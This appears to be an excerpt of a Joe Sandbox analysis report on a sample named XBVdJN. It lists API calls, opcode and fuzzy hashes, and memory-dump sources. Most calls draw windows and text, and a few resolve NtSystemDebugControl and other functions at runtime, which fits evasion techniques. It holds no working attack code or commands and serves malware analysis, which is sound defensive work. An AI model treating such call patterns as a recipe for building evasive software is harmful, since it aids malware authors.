                                                                                                                                                                                                                          • API String ID: 4123949106-3984717035
                                                                                                                                                                                                                          • Opcode ID: 3c5cb5ccc79fad391a1b17d6e0934c38bd26a346b471b35e962833af7e2e3654
                                                                                                                                                                                                                          • Instruction ID: dca8c3ea17dd3e520e814b34638e804b115d9afc45f57766fd106ee77595b676
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c5cb5ccc79fad391a1b17d6e0934c38bd26a346b471b35e962833af7e2e3654
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49315171E01389EADF60DBA68C45FEEBBFAEB45704F204069E505BA281D6309A45DF60
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 006E1334
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 006E133B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E1359
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcmemset
                                                                                                                                                                                                                          • String ID: NtSystemDebugControl$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 3137504439-2438149413
                                                                                                                                                                                                                          • Opcode ID: ffcfacf23d184d99374a5f17b72057c2e4997c97d199087664456bbd6863bd52
                                                                                                                                                                                                                          • Instruction ID: 90e6c7015ea8015584fcb8f1fc9cf0be1dc3d795e09eba57e570bde4f59406c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffcfacf23d184d99374a5f17b72057c2e4997c97d199087664456bbd6863bd52
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D01A17160239DEFDB10DFA5ECC89AFBB6AFB02304F00016AF901AA241D6708645DA50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3636361484-0
                                                                                                                                                                                                                          • Opcode ID: 40e49548ee5daaaf27d8608ea4e805269063e08125f45ea3f9f3c05f8d0067ec
                                                                                                                                                                                                                          • Instruction ID: 69e48ecb906a7c2719499d96515c8a0551c52ea4ddbba921cd7b8be56ec93d6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40e49548ee5daaaf27d8608ea4e805269063e08125f45ea3f9f3c05f8d0067ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D01FE72D143A96FDB105770DC4CBD677DEDB05310F140065FA45D7190DA749E858B90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
                                                                                                                                                                                                                          • srand.MSVCRT ref: 006E1878
                                                                                                                                                                                                                          • rand.MSVCRT ref: 006E1880
                                                                                                                                                                                                                          • srand.MSVCRT ref: 006E1890
                                                                                                                                                                                                                          • rand.MSVCRT ref: 006E1894
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Timerandsrand$FileSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4106363736-0
                                                                                                                                                                                                                          • Opcode ID: d900789626ec7aed877ec7f78eb5c954b1c360f04c85cddbcb415ecbcaeba368
                                                                                                                                                                                                                          • Instruction ID: 2abd4be3940f3a58abb772ceeb4b09a510d557174aac219dd60d08297f0ca705
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d900789626ec7aed877ec7f78eb5c954b1c360f04c85cddbcb415ecbcaeba368
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E04877A10328BBD700A7F9EC8A99EBBADDE84161B110567F600D3354E574FD448BB8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 006E603C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,006E6064), ref: 006E604F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1646373207-1793498882
                                                                                                                                                                                                                          • Opcode ID: 7af7157fc7b0a5e4cf8c469d21516864f13fc23057d98dd9cabf12fe1f1dd7b9
                                                                                                                                                                                                                          • Instruction ID: 6d5080a5a3f06ba3791582a5aa1536657d22dcfd49a6f01eb81acc34d1e67131
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af7157fc7b0a5e4cf8c469d21516864f13fc23057d98dd9cabf12fe1f1dd7b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53F0CDB11413998BEF70CEA5CC44BDE3BE5EB25750F50442AEA09CB281DB7486058B25
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000007B), ref: 0040B567
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B578
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040B61C
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040B648
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040B662
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040B727
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040B7F6
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040B849
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040BA7C
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BC9C
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BCEF
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BD75
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BE92
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BEE3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BF69
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C00C
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C0C1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C171
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C19D
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C1F0
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C33F
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C385
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C41F
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C465
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040C557
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C5C8
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C748
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C774
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C7C7
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040C84D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C8E1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C985
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CA25
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040CAC9
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040CBA1
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040CBF4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040CC7A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040CD1D
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CD63
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CE92
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
